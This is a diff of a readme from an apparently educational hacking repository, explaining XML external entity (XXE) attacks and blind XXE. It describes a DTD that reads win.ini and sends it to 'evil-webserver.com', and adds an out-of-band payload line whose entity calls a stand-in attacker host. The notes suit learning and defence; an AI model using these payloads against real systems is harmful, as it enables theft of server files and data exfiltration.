nerdyamigo/learntohack/XXE/readme.md

 - The code within payload.dtd is parsed by the XML parser, which reads the contents of win.ini and sends it as a parameter in an HTTP GET request back to `https://evil-webserver.com`

 The extracted data can be viewed by the attacker in their web server logs.

+# Blind XXE

+In many cases XXE will be blind, meaning the application will not return the values of any defined external entities in its response.
+Bling XXE vulns can still be detected and exploited, but more advanced techniques are required.

+	- Trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data
+	- Trigger XML parsing errors in such a way that the error messages contain sensitive data

+### Out of band techniques

+Def. an external entitity:

+` <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]> `

 ## Learn more